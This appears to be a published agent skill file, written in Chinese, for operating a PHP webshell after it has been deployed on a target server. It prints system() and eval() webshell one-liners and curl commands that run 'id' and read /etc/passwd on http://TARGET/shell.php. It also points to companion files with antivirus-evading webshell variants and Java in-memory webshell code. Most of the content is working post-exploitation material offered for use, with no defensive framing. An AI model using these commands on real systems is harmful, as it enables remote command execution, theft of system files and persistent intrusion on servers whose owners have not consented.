webshell-management

Installation
SKILL.md

Webshell 部署后 CLI 操作

前置条件:webshell 已部署到目标。如需生成/上传 webshell → 参考 webshell-deploy skill 及其 references/webshell-payloads.md(含 PHP 8 种免杀变体、JSP/ASPX 多版本)。

Java 内存马注入代码 → 参考 webshell-deployreferences/memory-webshell.md(Filter/Servlet/Listener/Spring/Agent 五种类型完整代码)。

Phase 1: curl 交互操作

1.1 命令执行

# system() 型: <?php system($_POST['c']);?>
curl -s -d "c=id" http://TARGET/shell.php
curl -s --data-urlencode "c=cat /etc/passwd" http://TARGET/shell.php

# eval() 型: <?php eval($_POST['c']);?>
curl -s -d "c=system('id');" http://TARGET/shell.php
curl -s -d "c=echo file_get_contents('/etc/passwd');" http://TARGET/shell.php
Related skills

More from wgpsec/aboutsecurity

Installs
6
GitHub Stars
1.3K
First Seen
Apr 22, 2026